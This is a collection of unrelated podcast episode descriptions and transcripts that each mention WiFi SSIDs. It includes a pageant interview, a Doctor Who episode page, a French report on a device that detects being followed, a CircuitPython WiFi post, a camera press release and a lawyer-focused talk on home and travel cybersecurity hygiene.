this podcast too. And rude for you as well. So you'll have the whole PT community rooting for you while you're on that stage. How do you think this experience is going to help you in your journey becoming to becoming a physical therapist, 21:11 I mean, just this right now, this networking, this opportunity to share my story and share my passions is what I've already noticed, has made a change in my future as a physical therapist, because this gives me opportunities to connect with people from all over the world. And not every second year DPT student gets to say that. So having that, you know that networking opportunity is what I'm most grateful for. But also, it's giving me that connection to people that you'll have as a physical therapist, that one on one being able to relate and tell people stories, but also to listen, I think that's one of the main things we do as PTS is listen to people, and what it is that's causing them pain, whether it be their physical or mental, and having the opportunity to really kind of get a dip my toes in the water as Miss North Dakota, will be will help me exponentially as a physical therapist. Well, 22:15 Cindy, this is Karen, I'm just for people listening. I'm just gonna hop in with one last question and comment. first comment is I am so blown away and impressed by your poise and your speaking ability. And, you know if this is something that you can take forward with your patients and to be a representative of physical therapy in the future, regardless of what happens in in the competition in December, I think you are well ahead of the game. So kudos to you on that. I'm very, very impressed. It's been a pleasure sitting in and listening to you and Stephanie chat. And my I had one sort of follow up question before we ended the the interview. And that is what do you feel? The Miss America? Or sorry? Yeah, Miss America. Okay, I thought I got that wrong for a second. No, no, no. I'm like, what do you what do you feel the Miss America Pageant can bring two young girls. So not someone who's you know, a second year DPT student, not the not even the teens. But you know, we're really looking for the for the young girls who are watching these pageants and looking up to you all. And just think maybe they're thinking, Oh, look at how pretty, but it goes a lot deeper than that. So what do you want those young girls to know? 23:51 So I love that you asked that. Because just recently at the Miss America, teen competition, they have this thing called Empower Academy. And it's for young women, young girls that have been watching the Miss America competition for years. It is for them to have the same experiences. So this weekend, I watch girls from the ages of five to 10 speak on a stage in front of judges in front of the entire Miss America class, speak as if they had been doing this for years. And I can't even imagine having that experience at such a young age. Because it really breaks down these barriers that young people can accomplish things. And just watching them I was amazed. And maybe it was the same kind of for you to me, but me to them, in this case that no matter what age we can accomplish whatever we want to and I got to see that firsthand this last weekend. So the Miss America organization is already accomplishing that kind of task of making young young women believe that they can do what The role models they're looking up to have been doing. Yeah, that's very 25:03 sweet. Go ahead stuff. 25:05 I appreciate that. Because I think that the first time I ever spoke in front of anybody was when I was like, I don't know, maybe 10 years old, maybe a little younger than that. And it was like through some type of pageant type experience. And I've been public speaking now for oh, my gosh, over 20 years. And I feel like what you just said about gaining confidence speaking in front of a national audience having to answer questions that have substance in them is and being able to express your own opinions to a lot of people that may disagree with you. I mean, that all that all starts at at at a stage like that. And so, you know, I do think that there is something to say about having a platform where young people, not just women, but young people in general can go on a stage in front of an audience and start speaking, because what's the number one fear of people? It's public speaking? Oh, yes, there are so many times that I go to a conference and somebody comes up to me, and they're like, Oh, my God, I'm gonna go speak and I'm so like, nervous, and I don't know what to say. And, you know, I get nervous when I go on stage, but it's more excitement, nervous. It's not like, Oh, my God, I'm afraid I'm gonna mess up, or I'm afraid of what these people are gonna think of me I have, I have that confidence. And I think a lot of that, in addition to some other things that I've done in my life, but a lot of that started on a stage in a situation similar to those young people. So I appreciate you saying that. Yeah. Yeah. It's, 26:39 it's been truly wonderful. And I've, I've loved being a part of it. 26:45 That's amazing. So I have one last question. Before we wrap things up, and it's a question I asked everyone, and knowing where you are now, in your life, and in your career, your Yeah, career? What advice would you give to your younger self? 27:06 There's a lot of things, I would give advice to my younger self. And it's crazy to say that at 24, because I still consider myself quite young. But I would say, to stop trying to speed through every road, every part of your journey, whether it's okay, I'm excited to graduate high school, and then I can go to college. Oh, I'm in college, I can't wait to get into graduate school. Oh, I'm in graduate school, I can't wait to get married, get a house, instead of rushing through those moments to really take time and understand why you're there. Because once you're done with that part of your life, it's gotten, you know, like, and I Yeah, I'd say it started when I was a swimmer in high school. I was like, Oh, I can't wait to be done with swimming. This has been my entire life. But now I look back. I'm like, I miss those days. I, I look at my undergrad, I constantly was stressing about getting into PT school, which a lot of us go through that. It's competitive. That's normal, but not always stressing about what's next. And being in the moment. That would be my number one piece of advice to my younger self and something I'm really taking into this year. Because the job Miss North Dakota is 365 days. I have to enjoy each and every day and not worry well, next month I have a conference or tomorrow I need to get this video done. It's taken in each moment. Like right now I'm sitting in this podcast, talking with you and experience in it to my full ability. And that is what I'm very happy. I've been able to notice that and learn from it. 28:47 That's very wise. Very wise advice. Well, thank you so much, Sydney for joining us. We had an awesome talk. Where can people find you if they want to look you up on social media or want to contact you? 29:01 So my personal Instagram is my name SSID and I KST and then my Miss North Dakota Instagram is Miss America en de in on Facebook. You can find me at Sydney cast Miss North Dakota, email Sydney cast@gmail.com All all spelt the same and super easy. And yes, my name is spelt Correct. I don't know what was going through my mom's mind. But we love her for it makes me different. 29:32 That's funny. That's great. Well, Sidney thank you so much, Stephanie. Thank you so much. We'll have links to all of your contact info and any other info you want to share at the podcast in the show notes for this episode at podcast at healthy wealthy smart.com. Stephanie, any closing remarks? 29:51 No, just good luck at Miss America, Sydney and we are all rooting for you. 29:57 We are we are and everyone Thanks so much for tuning in, be sure to watch the pageant or I should say scholarship program like the end of Miss Congeniality scholarship competition scholarship in December and let's all root for Sydney. So everyone, thanks so much. Have a great couple of days and stay healthy, wealthy and smart.
It's 2013 and Doctor Who is back for its anniversary season — with a new companion, a new outfit for the Doctor, and a lethal and potentially world-ending new threat from the Internet, more than a decade before the invention of Web3. Keep a close eye on your apes, everyone: it's The Bells of Saint John. Notes and links Celia Imrie is known and loved by all of us here at FTE from her role in Absolutely Fabulous as Jennifer Saunders's rival in PR, Claudia Bing from Bing, Bing, Bing & Bing. Here's an in-depth interview with her, about her career both as an actress and a writer, which published in The Scotsman in 2016. Danny Hargreaves was Doctor Who's extremely photogenic special effects supervisor, who was always a very welcome addition to any episode of Doctor Who Confidential. And, finally, it's time that we sat down and had a serious, proper talk about Doctor Who production codes. From the very beginning of the show in 1963, every story was referred to internally by its production code, which was initially a single capital letter from A to Z, then a double letter (AA to ZZ), then a triple letter (AAA to ZZZ) and then finally an initial number followed by a letter (4A to 4Z and so on). And so An Unearthly Child was A and Ghost Light was 7Q. Back in the day, certain of us knew the production codes for every story — sadly, in these hectic modern times, we have better things to do. You can find out all about the ins and outs of production codes here. Follow us Nathan is on Twitter as @nathanbottomley, Brendan is @brandybongos and James is @ohjamessellwood The Flight Through Entirety theme was arranged by Cameron Lam. You can follow the podcast on Twitter at @FTEpodcast. We're also on Facebook, and you can check out our website at flightthroughentirety.com. Please consider rating or reviewing us on Apple Podcasts, or we'll move in next door to you and give our wifi network an obscene and insulting SSID. And more You can find Jodie into Terror, our flashcast on the Whittaker Era of Doctor Who, at jodieintoterror.com, at @JodieIntoTerror on Twitter, on Apple Podcasts, and wherever podcasts can be found. We'll be recording our final episode some time in October. Our James Bond commentary podcast is called Bondfinger, and you can find that at bondfinger.com, at @bondfingercast on Twitter, on Apple Podcasts, and everywhere else as well. We can also be heard on the Blakes 7 podcast Maximum Power, whose coverage of Series B will be starting any second now. And finally, there's our Star Trek commentary podcast, Untitled Star Trek Project, featuring Nathan and friend-of-the-podcast Joe Ford. In the most recent episode, they are surprised to find themselves fighting to the death over a beautiful woman, in Amok Time.
Voilà un épisode qui conviendra parfaitement aux personnes méfiantes ou qui ont tout simplement peur d'être suivies. Aux États-Unis, un agent fédéral a mis au point un appareil capable de déterminer si vous êtes suivi dans la rue. Et le plus intéressant, c'est que son dispositif peut être fabriqué par n'importe qui à bas coût.C'est lors de la conférence Black Hat USA qui s'est tenue en août, que Matt Edmondson, un agent fédéral travaillant au département de la Sécurité intérieur des États-Unis a présenté son engin. Mais avant ça, la question est de savoir pourquoi Matt s'est-il lancé dans la construction d'un tel objet ? Et bien par tant pour lui qu'à la demande d'un ami et collègue du gouvernement qui avait peur d'être suivi lorsqu'il rencontrait des informateurs ayant des liens avec une organisation terroriste. Dès lors, Matt explique que pour seulement 200€, son appareil est capable de scanner les fréquences Bluetooth, Wi-Fi, SDR, ZigBee... et de repérer les appareils à proximité. Concrètement, il utilise un mini-ordinateur Raspberry Pi, alimenté grâce à une batterie externe USB auquel il a ajouté un petit écran tactile ainsi qu'un module Wi-Fi en USB.Dans le détail, Matt Edmondson explique que son système utilise le logiciel Kismet pour analyser les communications sans fil. S'il a commencé par enregistrer l'adresse MAC des appareils, l'agent s'est vite rendu compte que beaucoup pouvaient la modifier de manière aléatoire à chaque tentative de connexion. Il a donc décidé d'y associer le nom (SSID) du réseau recherché par les appareils. Ainsi, son système créé toutes les cinq minutes un nouveau fichier dans lequel il enregistre les informations de tous les appareils à proximité. Si le même appareil est présent dans plusieurs fichiers, cela signifie qu'il a été détecté à proximité de la personne à au moins cinq minutes d'intervalle, le système envoie une alerte. Au final, reproduire ce système est à la portée de tous ceux qui ont un peu d'expérience avec les systèmes Linux. Les composants sont en effet accessibles au grand public et le code du logiciel est en libre accès sur le site GitHub. À l'avenir, Matt Edmundson espère améliorer son système en ajoutant d'autres protocoles sans fil, ainsi qu'un GPS pour pouvoir enregistrer la localisation des appareils. Hébergé par Acast. Visitez acast.com/privacy pour plus d'informations.
Voilà un épisode qui conviendra parfaitement aux personnes méfiantes ou qui ont tout simplement peur d'être suivies. Aux États-Unis, un agent fédéral a mis au point un appareil capable de déterminer si vous êtes suivi dans la rue. Et le plus intéressant, c'est que son dispositif peut être fabriqué par n'importe qui à bas coût. C'est lors de la conférence Black Hat USA qui s'est tenue en août, que Matt Edmondson, un agent fédéral travaillant au département de la Sécurité intérieur des États-Unis a présenté son engin. Mais avant ça, la question est de savoir pourquoi Matt s'est-il lancé dans la construction d'un tel objet ? Et bien par tant pour lui qu'à la demande d'un ami et collègue du gouvernement qui avait peur d'être suivi lorsqu'il rencontrait des informateurs ayant des liens avec une organisation terroriste. Dès lors, Matt explique que pour seulement 200€, son appareil est capable de scanner les fréquences Bluetooth, Wi-Fi, SDR, ZigBee... et de repérer les appareils à proximité. Concrètement, il utilise un mini-ordinateur Raspberry Pi, alimenté grâce à une batterie externe USB auquel il a ajouté un petit écran tactile ainsi qu'un module Wi-Fi en USB. Dans le détail, Matt Edmondson explique que son système utilise le logiciel Kismet pour analyser les communications sans fil. S'il a commencé par enregistrer l'adresse MAC des appareils, l'agent s'est vite rendu compte que beaucoup pouvaient la modifier de manière aléatoire à chaque tentative de connexion. Il a donc décidé d'y associer le nom (SSID) du réseau recherché par les appareils. Ainsi, son système créé toutes les cinq minutes un nouveau fichier dans lequel il enregistre les informations de tous les appareils à proximité. Si le même appareil est présent dans plusieurs fichiers, cela signifie qu'il a été détecté à proximité de la personne à au moins cinq minutes d'intervalle, le système envoie une alerte. Au final, reproduire ce système est à la portée de tous ceux qui ont un peu d'expérience avec les systèmes Linux. Les composants sont en effet accessibles au grand public et le code du logiciel est en libre accès sur le site GitHub. À l'avenir, Matt Edmundson espère améliorer son système en ajoutant d'autres protocoles sans fil, ainsi qu'un GPS pour pouvoir enregistrer la localisation des appareils. Learn more about your ad choices. Visit megaphone.fm/adchoices
scott and dan just merged in Web (WiFi) Workflow for circuitpython and ESP32 (https://github.com/adafruit/circuitpython/pull/6685) which means that it's incredibly easy to start working with chips like the ESP32 which have excellent WiFi networking but do not have USB mass-storage. we want to have CircuitPython run on these chips but of course we ALSO want to have a great user experience for beginners, and being able to pop open a serial terminal or upload files via a browser's drag-n-drop capabilities would be sweeeeet. we pulled out an odroid go (https://www.hardkernel.com/shop/odroid-go/) which was a popular ESP32 WROVER-based game console, and uploaded the code with esp32 loader (https://espressif.github.io/esptool-js/) . then we configured the AP and SSID password (https://docs.circuitpython.org/en/latest/docs/workflows.html) - this will be done more automatically in the future, for now its done manually with some REPL commands. Now when we visit the IP address displayed on the odroid's screen, it will let us immediately go to the built-in serial console that is also web-compatible! any repl commands are echoed on the display as well. next up we will try uploading files. Visit the Adafruit shop online - http://www.adafruit.com ----------------------------------------- LIVE CHAT IS HERE! http://adafru.it/discord Adafruit on Instagram: https://www.instagram.com/adafruit Subscribe to Adafruit on YouTube: http://adafru.it/subscribe New tutorials on the Adafruit Learning System: http://learn.adafruit.com/ ----------------------------------------- #adafruit #circuitpython #esp32
The Reggae Boys are back with our new series covering topics in dancehall. For the first installment we have the homie Van of The Black Variant & SSID podcasts come thru as we discuss possibly the greatest Riddim of all time the Diwali Riddim. The Diwali Riddim has classics from Sean Paul, Wayne Wonder, Bounty Killer, Beenie Man, Lumidee, Rihanna, Danny English & Egg Nog among many others. Playlists - Spotify: https://open.spotify.com/playlist/2MGbnmhIuO8aurVCsaPVSQ?si=qEGJ8qauQi-01HrE5v6vIg Apple Music: https://music.apple.com/us/playlist/bashment-sessions-episode-1-diwali-riddim/pl.u-e98lkqjizPZebKe Pod socials Twitter: @reggaeboysradio ; IG @reggaeboysradio Josh's Twitter: @the786official; IG: @theseveneightsix Troy's Twitter/IG: @bytroycameron Van's Twitter: @1017Van/ @BlackVariantRNC Produced by Banks: @iamnotbanks
Does hiding your SSID make it more secure? Will hiding your SSID keep the hackers away? We'll show you how to reveal a hidden SSID with ease using your laptop. If the SSID is hidden, how does a device know how to find it? In this episode, we'll discuss why hiding your SSID is not […] The post CTS 287: Not So Hidden SSID appeared first on Clear To Send.
Os cuento cómo tenemos configuradas las diferentes redes WiFi que tenemos en el pueblo: nombres, canales, problemáticas e ideas para el futuro.
RICOH THETA unveils new 360-degree camera model: THETA X Hitting the market in March 2022, the advanced model features many firsts for the brand including a large touch screen display for enhanced usability TOKYO, Monday, Jan. 24, 2022 /PRNewswire/ -- Ricoh Company, Ltd. (President and CEO: Yoshinori Yamashita) today announced the launch of the RICOH THETA X. Designed in pursuit of enhanced usability and outstanding quality, this advanced model joins RICOH THETA's series of 360-degree cameras that shoot immersive still images and videos in a single shot and is equipped with many firsts for the brand: a large touch screen, interchangeable battery, and external memory card. Experience the interactive Multichannel News Release here. The RICOH THETA X's most innovative feature is the 2.25-inch full-color touch screen display, making standalone camera use much easier by reducing the need to connect to a remote control or smartphone app. Other first-time function additions include an interchangeable battery and an external memory card for more efficient and reliable shooting. Smartphone connectivity has also been improved, as the RICOH THETA X no longer requires the need to enter an SSID when establishing a Bluetooth connection. RICOH THETA X also boasts real-time stitching capabilities with stabilization, removing the need to stitch videos – this improves the processing time of 360-degree videos on computers drastically. "Since RICOH THETA released the world's-first 360-degree camera in 2013, it has been utilized in a wide range of fields to expand the possibilities of photographic and video expression. The pandemic caused an even greater need for immersive imagery and virtual tours to boost business efficiency, especially in the real estate, construction, design, and automotive industries—and we only expect that to expand into additional industries," said Shinobu Fujiki, General Manager of RICOH Company's THETA Business division. "As we strive to meet the needs of our customers through the innovation of our digital devices and services, this camera is designed to help streamline workflows and deliver high-quality imagery for business users and consumers alike." Ricoh Company Media Release continues in the We Get Around Network Forum (www.WGANForum.com) here: https://forum.we-get-around.com/topic/16301/page/1/ricoh-theta-unveils-new-360-degree-camera-model-theta-x/
As the world re-opens and you begin to stretch your legs, ALPS Risk Manager Mark B tells some true tales and offers some tips for safeguarding your client data and maintaining your firm's cybersecurity from your phone, Airbnb, or the wide-open road. Transcript: Mark Bassingthwaighte: Hello, I'm Mark Bassingthwaighte, the risk manager with ALPS, and welcome to another episode of ALPS in Brief, the podcast that comes to you from the historic Florence building in beautiful downtown Missoula, Montana. It is a pleasure to have the opportunity to visit again via podcast. Before I get into the topic of this podcast, I'd like to share story and some information about what's going on and in my life as a way to set up where we're going to go. Let's start with a call that I took earlier this week, and it came from an attorney who really wanted to understand if what he was doing in terms of security with his system was sufficient, if there was other things that he could do. What prompted the call is he went through an experience somewhat similar to what happened to my wife and I a number of years ago, he was the victim of identity theft. Had a tax return filed, fraudulently filed, obviously, in his name, and some other things had occurred. One of the mistakes he made, however, was using a complex password. Now, that was not the mistake, that's a great thing, but he used it on multiple accounts. And as a result of getting his personal information, they were also able to get into his work computer. Some email was being sent out from his computer under his name, trying to scam clients and some businesses he works with out of funds. And so, that was a bit of a mess. The other situation that's going on in terms of my own life is, and this is all good, but my wife and I are currently in transition. We are going through something I think a lot of people are going through in these crazy times, and it has to do with moving. Long story short again, the timing of moving out of one home, which has been sold, and into a new home, which is currently still under construction, did not line up as close as we might have liked, so we are currently in transition, living in a temporary apartment until things settle down and get finished. You know, it's quite a change. Most of our belongings are sitting in storage. We kid around that at some point when we finally get settled, and the truck unloaded and start unpacking, it'll be like Christmas. We'll say, "Hey, I had no idea we had this stuff." So it's got to be fun. But I began to realize, although I've been telecommuting for many, many years, and will continue to do so, this transition into a corporate apartment, and by that, I simply just mean it's a small furnished apartment, sort of struck me as I'm going through an experience similar to what I think a lot of people did when they had to rapidly transition from the office to working from home in the early days of the pandemic. There were some things here, that as I started to set up and figure out what was going on, I realized, "Oof, wait, there are some security issues that really need to be addressed." I thought it's worth talking about some of this. The lawyer that called, it was about best practices. You know, "What am I doing wrong? What am I doing right? Is there anything else I could be doing?" And we had a good discussion, and it turns out there were a few things she could do to further secure what he was doing. And again, I sit and think, "Okay, boy, I didn't realize, just wasn't thinking about how much I take for granted given my old situation and then transitioning." So let's talk about what we can do as individuals to make our systems as secure as we can to help protect the competences, the property, the identities of our clients, and of course our own personal information. This discussion is not about everything that we can do to secure an office network. It's more focusing on the day-to-day basics, the day-to-day things we should all be thinking about that can help. IT, at our firm, keep us secure as a firm, and keep our information and the information of our clients private and confidential. That's look at this, and I want to start with just the basics, and then we'll kind of explore some other things. But the basics, it is extremely important that we keep the operating system and the applications that we're running on all these devices current in terms of security patches. Now, when I talk about devices, I'm talking about the laptops or PCs that we have at home, but even the mobile devices we travel with for vacation or for work trips. You know, smart phones, tablets, all of these things we need to keep current. Sometimes we may even need to go out and look for patches. I have to do that occasionally on applications on our cell phones. But these patches are being issued for a reason, and they are often bringing additional security features or updates to close vulnerabilities that have been discovered in prior versions, so absolutely essential. Now, one of the things that a lot of people do, and we all spend all kinds of money nowadays on these smartphones, and there's some crazy awesome phones out there, but we treat them as phones. We're not always thinking about the fact that this is a pretty robust computer. So we need to make sure that every mobile device and every device in our home that we are using for work has a internet security suite running, and it too should be kept current with all patches. One side note here, do not rely on free security programs or free VPNs. There's lots of free stuff out there, even in the security space, and you get what you pay for, which is very little when it comes to security. Now I'm not suggesting that the security software, these free VPNs, don't do what they say they're going to do. A free VPN will certainly encrypt your data stream so that anybody that tries to intercept this data stream won't see it. But the company that gives you this free product, there's an exchange, and the exchange is they get to monetize and monitor all your doing, and so you are what they are making money off of. That's not acceptable. And for a lawyer who is practicing law in terms of using these devices in the further and the practice of the law, because that information, just no. So you need to spend the few bucks that it's going to cost and be a bit more secure about it all. Turn on full disk encryption. You know, in this day and age, when it's one setting on a phone or a laptop, turn this stuff on. I consider it unethical, I truly consider it incompetent, not to take the time to turn this stuff on. Full disk encryption is typically once you turn your device off and somebody tries to turn it back on, if it's lost or stolen, if they don't have the password to decrypt, your data is protected and your client confidences are protected. So turn that on. Set up the ability to do remote wipes if a device is ever lost or stolen. I mean, doesn't that seem like a no-brainer? Take the time to do that. Again, it's so simple and easy to do. Use strong passwords, long pins, and never use the same password or pin on different devices or accounts. The story I just shared with the lawyer who called me, that was the mistake. He was using a very complex password, which was great, but he was using that same password on multiple accounts. You know, if they get one, they have now access to everything. That that makes no sense. Now, what is a complex password? Well, best practices would say 16 characters. We're rapidly approaching 20, a number of people that I work with and know in the security space really are saying 20. I routinely am using 20 to 24 on a number of accounts if the device or the application will accept that. And when we say complex, so in my case, we have 20 characters on some of this stuff. It's upper, lower case letters. It's symbols. It's numbers. And it's going to be very, very hard to guess. You know, there's no dictionary words here that that would be easy for a hacker to try to figure out. A lot of pushback that I get on this is, "How can I remember all of this stuff? Good Lord." You know? "I have trouble remembering what I had for breakfast yesterday, Mark." Well, I am not kidding you when I say that my wife and I probably manage between 200, 250 complex passwords and different usernames. I never repeat. I never use them on multiple counts, this kind of thing. What have I done differently? I use a password manager. Personally, I use RoboForm. There are a number out there that are quite good. Dashlane would be another example. But these programs store and manage all these complex passwords for us. And if I need to change a password, it will even do that for me and randomly generate a new complex password, and memorize it for me. So all of my wife and I need to do is remember a very complex, and this is a long one, but a very complex passphrase, and that's the keys to the kingdom. It's not written down anywhere. We remember it. There's no stickies, it's all easy. But we have the ability now to use complex passwords in every aspect of our life, on any account and device that it'll work with. Turn on or utilize two factor authentication on all accounts. Don't make it easy. Two factor authentication, we're talking about authenticator apps or sending a pin as you try to log in your bank account. You get the code, a six digit code, typically, on a text message. You don't want to make it easy. If somebody happens to figure out what the password is on, heaven forbid your IOLTA account, and they're trying to steal some money out of them, well, when they're logging in, if they don't have your phone, the text message isn't coming to them. It's just one extra level of protection. And I'm telling you. Now, TFA, you can hack it. Using that doesn't mean you're 100% secure, but you are exponentially more secure than not using TFA, so absolutely use that on every work personal account that you can in terms of if it's available: email accounts, financial accounts, in terms of investment, bank accounts, those kinds of things, are obvious key places where you would want to do that. Install a VPN. A VPN, and that stands for virtual private network, and it is a software program that will encrypt your data stream so that if you are, well, I'm going to talk about this a bit more in terms of wifi momentarily, but it just makes sure that the sessions, when we are on the internet, that the data stream is encrypted. Again, we're trying to make it ever more complex. Those are some basic things to think about. But now I want to shift gears a little bit and explore. You know, as lawyers, we do take vacations and we travel for business, and there's some exposures that come up here as well. It could be staying in an Airbnb, in a hotel. The list goes on. So a couple of quick behavioral comments, things that we can do. Never use a public computer. I'm thinking about the business center at the resort in Cabo, or at the hotel in DC, whatever it might be, or even local libraries. There's all sorts of places where public computers are available. Absolutely not acceptable in terms of practicing law, communicating with clients. These things are very, very difficult to keep secure. Anybody can come in and do all kinds of stuff, so I would just not use them at all. Literally, if I had my own firm and was in charge of things here, I would have one warning, and do it twice you're fired if somebody, anybody, were using a public computer for work. It's that high risk. No public wifi. No open. You know, I'm talking about the airport, I'm talking about the signal at the hotel, I'm talking about Starbucks, those kinds of things. We absolutely cannot use this if any alternative exists. And there are alternatives. I won't get into what all the risks are, but it's very, very insecure and very high risk. So what's an alternative? Well, when I travel, a lot of times what I will do is connect my laptop to my smartphone. I'm using my smartphone then as a hotspot, and so the data stream will be sent using the carrier signal, AT&T, Verizon, whatever carrier you have. Far more secure than the local wifi hotspot. If however, and I can appreciate at times there are some circumstances where it may not be an option and you really must use wifi, there are some interesting ethics opinions out there that talk about this, but it is an acceptable risk with certain conditions. The two big wins are this, make sure that you know what the legitimate signal is. If you're at an airport and you're turning it on, you're trying, and it says, "Oh, here's Free Jet Blue wifi." "Oh, I love Jet Blue." Jet Blue has never made wifi available. Okay? But that signal has been out there. People will just create names that they think people will log into. If you're at a Hilton Hotel and you see Free Hilton, it's not Hilton. That's not what they call their network. Make sure you know. Ask the barista, ask the person at the front desk at the hotel. "What is the name of the network that you have set up that's the legitimate one for me to use?" So now which one to connect to. Then the other thing is, and this is not optional, as soon as you log into the network, initiate, use the VPN. Encrypt your signal. Is this risk-free? Absolutely nothing is risk-free. But this is going to be a little bit more risky than using the carrier signal, but you're taking reasonable precautions to do what you can in light of the circumstances to be as secure as you can. Those are two key things to think about. Some other things, don't leave devices on and accessible if you step away, and you have a conversation with somebody, if you're outside working around a pool on vacation, trying to just get a little sun. Don't leave your laptop on at some table unwatched. Have it automatically timeout and log off, or in 10 minutes, or whatever it might be. If you want to run down to dinner in your hotel room, again, log out, or better yet just turn the thing off until you get back up there. But take some steps. Again, it's all about making sure. We don't want to make it easy for others to get into our systems. So there's a couple of things to think about in terms of vacations and travel. Next, I'm thinking about the move here, and stepping in. My big concern, and I'm using this as a parallel or a corollary to the work from home struggles and that transition. My immediate concern was the router. You know? I have the instructions here. The username is admin. Okay, that's the default. A lot of them are named admin. The password that they had set up was easy to guess and just, you know. You look and say, "Okay, I don't know what they've done with the settings." That's completely unacceptable. I cannot and would not put myself at risk using that signal, let alone ALPS. Now, I may be a little crazy at times, I don't know, but I kept my new router, my personal router, I had that with me. Now, I don't travel with a router all the time, although if I'm going to start traveling and I may stay put for a couple of weeks somewhere, I actually might start doing that. I'm very sincere in saying that. But I'm able to trust the signal and be far more secure. I'm not suggesting now, again, that you take routers with you on your travel, but I am suggesting, hey, in your home, if you've not thought about this and taken steps to secure your router, now is the time. There are all kinds of exposures that can come into play here. The purpose of this talk is not to really explore all that, but it's just to say you need to do something. Let me go through, I have a short list here of things from an article I wrote about this, but I want to talk about some of the basics. You need to understand that the usernames and passwords, the default ones, are available on the internet, they're often standards, and that they need to be changed. So again, think about the complex password. That's have a very complex password for the router, and that's change the username from admin to something that is a bit more unique to you. Change the network SSID. Again, the name of the network. Every router comes with a default name. That has to be changed or something that's unique to you, but don't make it something that's obvious as to who you are. You know, Mark at 2022 Front Street. The neighbors all know, "Hey, that signal's Mark. And you know, no. You want to make it, "I don't know who this is," kind of. Okay? Set up a guest network in your home, with its own network name and your unique password, so that guests have access to a network. I trust our kids. They're all good kids. They're all adults. We're empty nesters. But when they come home, none of them are allowed on the home network, because it's used for work, and there's a lot of, you know. It's personal information. I don't want to expose my stuff to there, and vice versa. But you know, if they're doing something they shouldn't be doing on the network, it's separate. I just strongly encourage you to do that. Because when kids come into the home, and friends of your kids come into the home, and they're gaming, and doing all kinds of things, if they're on your network that your work computer, and your personal devices, and everything's on, you're risking. They bring this new level of exposure that we're not necessarily thinking about. So block that. Set up a separate network. If the firmware version of your router isn't current update to the most current version available, it's all about security patches. Routers need to be updated as well. If it's an auto update option, check that to make sure. If you can't tell or it looks like there's been no update even released in the last 12 to 18 months, throw out that router and get a new one. And I'm not kidding around. These routers need to be able to be updated automatically, and the updates, a lot of routers, they stop ... I had an older router and it was two years out of date before I finally realized, I'm going, "Well, that's not good." So get rid of it and get something current. Confirm that the network authentication method, and what we're talking about is in the encryption that the routers using, is set to WPA2 personal, or even better, WPA3 personal, excuse me, if that option is available, WPA3 is simply just more secure. If neither option, WPA2 or WPA3 is available on the router, it's old, toss it, get a new one. Not kidding. And finally, turn off universal plug and play. That's sort of the functionality that makes it very easy to connect new internet of thing devices and whatnot around the house. I know that it makes connecting new devices when you introduce them to the home a little less convenient, but leaving it on provides hackers easy access. That's just not acceptable. I mean, if you want to do that in your own life and nothing in your home is connected to the office network or you're doing nothing for work, okay. Have at it, I guess. But when we are using devices, the network, for work, that's got to be turned off. That access avenue, for lack of a better description, has been used even to insert programs like banking Trojans that try to capture your login credentials to your bank account or to your 401k. Not good. We need to address that. Set up a defined work space. Part of this is a wellness thing for me, part of it is just establishing boundaries in a home, perhaps with children, but having a defined workspace that you can enter and exit from and others can learn to respect can be a huge difference. No device sharing. Absolutely no device sharing. Confidentiality is in play and there's no pandemic exception. You know, if you are using devices: work computers, personal computers for work, smart everything. The kid's, family, if they are not members of your firm, cannot and should not be on these devices. And the final thing that I want to talk about is just behavior in general. There's really been a couple of interesting studies of late looking at this, in terms of some security studies, looking at behavior. I find it absolutely fascinating. Part of it has occurred because of this massive work from home thing, but it's true, this has been true pre-pandemic and it's going to stay true post-pandemic and vacations. When we use our own devices, as opposed to a work-controlled device, a work-issued device, and when we are outside of a formal office setting, whether it's vacation, at home, et cetera, we actually, in terms of just seems to be inherent to the human race, I guess, but we seem to be inherently less vigilant, less diligent. We just get far more casual. So we are more easily tricked, or you know, falling prey for a phishing attack or clicking on something we shouldn't be clicking on, not just paying attention, not turning things off, sharing devices. We just get very, very casual. We can't. Stay sharp. Think before you click. Don't get too comfortable with the casualness. Don't get too comfortable with this new normal. I understand that for many of us, as an example, we had to transition very quickly to a work from home setting, and it was about making sure the tech works so that we keep moving forward as best we could. And little thought was given to the security of side of this. And then we get comfortable with it and we don't even think about it. That's what I'm trying to address, in part with this in terms of work from home with this, but I want you to think about it in all assets. It's not just the pandemic, it's not just working from home. It's when we're traveling, when we're on vacation. We need to stay vigilant and we need to periodically just take a few minutes and sit down and think. "Wait, is this a responsible thing to do?" "Wait, have I taken all the steps that I should have taken earlier on or I should be taking now?" I certainly haven't covered everything that you can do, but these are key things, and important things, and basic things that I think we should all be thinking about, and that should be on your radar. So that's it. I hope you found something of value out of this short discussion. I encourage you, if you have any concerns or questions, something that I might be able to help with, please don't hesitate to reach out. My email address is mbass, M-B-A-S-S, @ALPSinsurance, one word, ALPSinsurance.com. So ALPSinsurance.com, mbass@ALPSinsurance.com. You do not need to be an option shored to visit with me if there's something I can do. Hey, if someone reaches out and I'm able to do something that might prevent just one hack, one breach, that's a great day. That's it folks. Hey, have a good one. God bless.
On this special episode of Show Your Work, Banks and Nelson are joined by special guests and friends of the show Amp of Random Acts Of Podcast, X, and VanRidd of the Black Variant Podcast! The guys talk about all things wrestling, from the WWE Top 50 Women's Wrestlers list, to what got us to WrestleMania, as well as preview and predict both nights of WrestleMania 37. Follow, Rate, Like and Subscribe! Nelson: @whoisoriginel Amp: @ampaveli RAOP: @raopodcast X: @XTheExiled Van: @SSID_Ent Black Variant: @BlackVariantRNC Produced by Banks: @Banksnorest2
